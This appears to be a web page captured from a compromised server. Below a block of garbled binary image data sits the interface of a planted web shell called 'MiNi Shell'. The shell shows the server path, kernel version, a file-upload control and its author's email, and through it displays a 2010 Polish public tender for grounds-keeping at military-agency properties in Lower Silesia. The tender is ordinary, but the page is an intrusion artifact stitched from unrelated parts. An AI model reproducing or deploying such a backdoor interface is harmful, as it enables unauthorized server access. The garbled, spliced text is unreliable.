JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100920/299020-N-2010.html

<p class="kh_header"><b>Wrocław: PORZĄDKOWANIE WYBRANYCH NIERUCHOMOŚCI BĘDĄCYCH W ZASOBIE OT BAMW WROCŁAW</b><br>
<b>Numer ogłoszenia: 299020 - 2010; data zamieszczenia: 20.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Oddział Terenowy Biura Agencji Mienia Wojskowego we Wrocławiu , ul. Zwycięska 14, 53-033 Wrocław, woj. dolnośląskie, tel. 071 3647374; 7661725 w. 224, faks 071 7661734.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.amw.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PORZĄDKOWANIE WYBRANYCH NIERUCHOMOŚCI BĘDĄCYCH W ZASOBIE OT BAMW WROCŁAW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług porządkowania wybranych  nieruchomości będących w zasobie OT BAM we Wrocławiu, a w szczególności:
- koszenie trawników, 
- przycięcie żywopłotów, 
- usunięcie chwastów, 
- uporządkowanie chodników
- wywóz odpadów

Szczegółowy opis przedmiotu zamówienia

Zadanie 1 

1.	Legnica ul. Rzeczypospolitej 114-116 (dz. nr 174, 175/1)

  Od strony ulicy Okrężnej 
- koszenie trawy przy bramie wjazdowej przy ulicy Okrężnej 225 m2
- koszenie trawy na nieruchomości wzdłuż ogrodzenia przy ul. Okrężnej 9m x 120m 
  =  1080 m2
- przycięcie żywopłotu na długości 30 mb  

Od strony ul. Rzeczypospolitej 
- usunięcie chwastów i uporządkowanie przy bramie wjazdowej na szerokości 26 m 
  x 4,5m = 117 m2
- przycięcie żywopłotu na długości 175 mb 
- koszenie trawy 444 m2 + 1575 m2 =2019 m2
- usunięcie chwastów i uporządkowanie chodnika na nieruchomości wzdłuż ulicy  
  2,20 m x 175 m = 385m 2 

2.	Legnica ul. Bielańska (dz. nr 101/4)
- przycinka żywopłotu 2 x 50m wzdłuż chodnika prowadzącego do budynku Klubu - 
  100 mb
- przycinka żywopłotu wzdłuż ogrodzenia przy  ulicy Bielańskiej na długości 66 mb
- przycinka żywopłotu wzdłuż ogrodzenia  przy boisku 50 mb  
- koszenie trawy  13,5m x 50m = 675 m2

3.	Legnica ul. Bielańska (OSF) (dz. nr 16/3)
- wykoszenie trawy wzdłuż ogrodzenia  nieruchomości od ulicy Bielańskiej 
  1,5m x 220m = 330m2 

4.	Krotoszyce ul. Piastowska 32  (dz. nr 281/3)
  - skoszenie  trawy 311 m2	25 x 5 (125m2)  wzdłuż ogrodzenia od ul. Piastowskiej 
                                		17 x 3 (51 m2)   z lewej strony budynku 
                                 		45 x 3 (135 m2) wzdłuż ogrodzenia od ulicy
RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 				 4 640,00 m2
-	Przycinanie żywopłotów							        421 mb
-	Zamiatanie chodników i placów wraz porządkowaniem z liści, 
chwastów oraz innych  odpadów					                502,00 m2 
Zadanie 2 

Głogów ul. Sikorskiego (dz. nr 63/12)
    - uporządkowanie terenu wokół budynków 1, 22 i 23 - 500 m2
    -  koszenie trawy przy budynku nr 1 -200 m2
    - usunięcie liści i innych odpadów z chodnika wzdłuż ogrodzenia od ulicy Wojska 
      Polskiego  - 60 mb x 2 m = 120m2
    -przycięcie żywopłotu przy budynku nr 1,  70m + 24m = 94 mb
RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 				    200,00 m2
-	Przycinanie żywopłotów						                     94 mb
-	Zamiatanie chodników i placów wraz porządkowaniem z liści, 
chwastów oraz innych  odpadów						    620,00 m2 

Zadanie 3

1.	Bratków (dz. nr 42)
- koszenie trawy  3 450 m2 

2.	Dłużyna Górna (dz. nr 82/2)
- koszenie trawy 200m x 3m=600 m2
RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 				4050,00 m2

Zadanie 4 

1.	Szklarska Poręba ul. Oficerska 4 (dz. nr  245/10)
     - koszenie trawy wzdłuż chodnika prowadzącego do budynku nr 1 - 500 m2

2.	Jelenia Góra ul. 1 Maja 56  (dz. nr 19/10, 19/7)
      - zamiatanie, usunięcie liści i chwastów i innych odpadów przy budynku  A - 550m2 
        i  przed budynkiem B  50m x 10m =500 m2  
   - koszenie trawy za bud. Nr A -  300 m2

3.	Jelenia Góra ul. Podchorążych - stadion  (dz. nr 9/6, 9/7)   
      - koszenie trawy - wzdłuż ulicy Podchorążych  2 275 m2

4.	Jelenia Góra ul. Podchorążych -byłe koszary (dz. nr 1/44, 1/52, 1/50, 1/48, 1/10)
- koszenie trawy przed budynkiem nr 7 (dz. nr 1/44) 6000 m2
- koszenie trawy za budynkiem nr 7,19 i 28 (skarpy) 3120 m2
- usunięcie chwastów, koszenie w pasie 1m wokół budynków nr 24, 25, 20 i 23 - 
  80+60+60+168 = 368 m2

RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 			           12 563,00 m2
-	Zamiatanie chodników i placów wraz porządkowaniem z liści, 
chwastów oraz innych  odpadów					              1050,00 m2 	
Zadanie 5

1.	Strzegom ul. Armii Krajowej (dz. nr 3/18, 3/17)
    - zamiatanie chodnika wzdłuż nieruchomości 120 m x 2,30m = 276 m2,
    - usuwanie chwastów wokół budynków 100 m2,
      - koszenie trawy wzdłuż nieruchomości 120 m x 2,30m = 276 m2,

2.	Szczawno Zdrój ul. Kościuszki 7 (dz. nr 607)
    -uporządkowanie chodnika z liści, chwastów i odpadów na długości 28mx2m= 
      56 m2 

3.	Lubawka ul. Przyjaciół Żołnierza 4b (dz. nr 261)
      - koszenie trawy - 500 m2
      - uporządkowanie chodnika z liści, chwastów i odpadów na długości 60 mbx2 =120 m2

RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 				776,00 m2
-	Zamiatanie chodników i placów wraz porządkowaniem z liści, 
chwastów oraz innych  odpadów						552,00 m2 

 Zadanie 6

1.	Wrocław ul. Mieszczańska 9 (dz. nr 3/8)
        -  uporządkowanie terenu przy budynku nr 39, 28, 50, 53 w pasie 3 metrów szerokości 
           590x3= 1770 m2 plus plac przy budynku nr 53 (520 m2) = 2 290 m2
     -  koszenie trawy  5 805 m2;
     -  przycinka żywopłotu od strony bud. nr 50 - 40mb i wzdłuż drogi wjazdowej 80 mb = 
        120 mb;
     - uporządkowanie terenu z liści, chwastów i innych odpadów - 5 500 m2;

2.	Wrocław ul. Graniczna 105 (dz. nr 35/4)
   - przycięcie żywopłotu wzdłuż ul. Granicznej na długości 33mb, 
   - koszenie trawy przed budynkiem nr 105 i wzdłuż chodnika koło stacji trafo  = 70m x 3m
     210 m2,
  - uporządkowanie terenu z chwastów, liści i innych odpadów  -  chodnik  przed 
     budynkiem na długości 35mb x 2,30 = 80,50 m2

3.	Wrocław ul. Avicenny (dz. nr 6)
    - wykoszenie trawy przy ujęciu wody i wzdłuż drogi wewnętrznej nieruchomości-500 m2

RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 			             6 515,00 m2
-	Przycinanie żywopłotów							        153 mb
-	Zamiatanie chodników i placów wraz porządkowaniem z liści, 
chwastów oraz innych  odpadów						  7870,50 m2 

Zadanie 7

1. Cieśle, gm. Oleśnica  (dz. nr 59/1)
a) część  koszarowa 
         - koszenie trawy od bramy wjazdowej do budynku nr 14 i  budynku nr 12 (kotłownia)  - 
          1100 m2
      b) część rekreacyjna
          - wykoszenie trawy przed wejściem do domków letniskowych - 500 m2

RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 			             1 600,00 m2



Zadanie 8

1.	Opole ul. Batorego (dz. nr 123)
- skoszenie trawy przy transformatorze kontenerowym  200 m2
- skoszenie trawy wzdłuż drogi od bramy głównej do budynku nr 2 -600 m 2

2.	Opole ul. 10 Dywizji Sudeckiej Zmechanizowanej (dz. nr 1/4)
 - wykoszenie trawy od ulicy 10 Dywizji Sudeckiej Zmechanizowanej w pasie 2 m, 
     na  długości działki 1/4, tj. 108m=2m x 108m = 216 m2 
RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 				 1 016,00 m2

Zadanie 9 

1.	Kudowa Zdrój ul. Zdrojowa/Słowackiego (dz. nr 229/2)
- koszenie trawy 2 500 m2
- uporządkowanie chodnika wzdłuż nieruchomości z liści i chwatów - 32mb 
  ul. Zdrojowa + 55 mb ul. Mickiewicza + ul. Słowackiego 55 mb  = 142m x 2m = 
  284 m 2
RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 		                       2 500,00 m2
-	Zamiatanie chodników i placów wraz porządkowaniem z liści, 
chwastów oraz innych  odpadów						    284,00 m2

Zadanie  10

1.   Lądek Zdrój ul. Bema 2 (dz. nr 457)
-koszenie trawy - 300 m2
-uporządkowanie chodnika z liści, chwastów i odpadów na długości 20mx2,3m=46 m2

2.	Lądek Zdrój  ul. Fabryczna (dz. nr 143/3, 312/2)
-koszenie trawy 3 450 m2 między budynkiem a ogrodzeniem od strony ulicy
  Fabrycznej 
- koszenie trawy przy stacji gazowej i rowu - 2 300 m2 
      
RAZEM: 
-	Jednokrotne koszenie trawy wraz z wywozem 				6050,00 m2
-	Zamiatanie chodników i placów wraz porządkowaniem z liści, 
chwastów oraz innych  odpadów						   46,00 m2 

OGÓŁEM: 

1. Jednokrotne koszenie trawy wraz z wywozem  					 39 910,00 m2 
2. Przycinanie żywopłotów  								       668 mb 
3. Zamiatanie chodników i placów wraz porządkowaniem z liści, 
    chwastów oraz odpadów mineralnych 						10 924,50 m2 

UWAGA!
Wykonawca prac porządkowych  zobowiązany jest do przedstawienia kart przekazania odpadów wywiezionych z nieruchomości będących w zasobie 
OT BAMW we Wrocławiu, objętych przedmiotem zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje ewentualne udzielenie zamówień uzupełniających o wartości nie większej niż 10% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.34.00.00-5, 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena ww warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena ww warunku zostanie dokonana  zgodnie z formułą spełnia - nie spełnia w oparciu o przedłożone dokumenty wyszczególnione w siwz - tj. wykaz  wykonanych usług porządkowania nieruchomości o wartości nie mniejszej niż 15.000 zł brutto wykonanych w okresie ostatnich trzech lat przed upływem składania ofert</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena ww warunku zostanie dokonana wg reguły spełnia - nie spełnia w oparciu o przedłożone dokumenty lub oświadczenia wyszczególnione w siwz - tj. wyazk osób które będą uczestniczyły w realizacji zamówienia  wraz z informacjami na temat ich kwalifikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza w umowie zmianę terminu wykonania usług w przypadku długotrwałych, niekorzystnych warunków atmosferycznych uniemożliwiających  wykonanie prac za zgodą obu stron wyrażoną na piśmie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.amw.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego tj. OT BAMW we Wrocławiu ul. Zwycięska 14, pok. 209, IIp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2010 godzina 09:00, miejsce: siedziba Zamawiającego- OT BAMW we Wrocławiu ul. Zwycięska 14, pok. 205, IIp..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com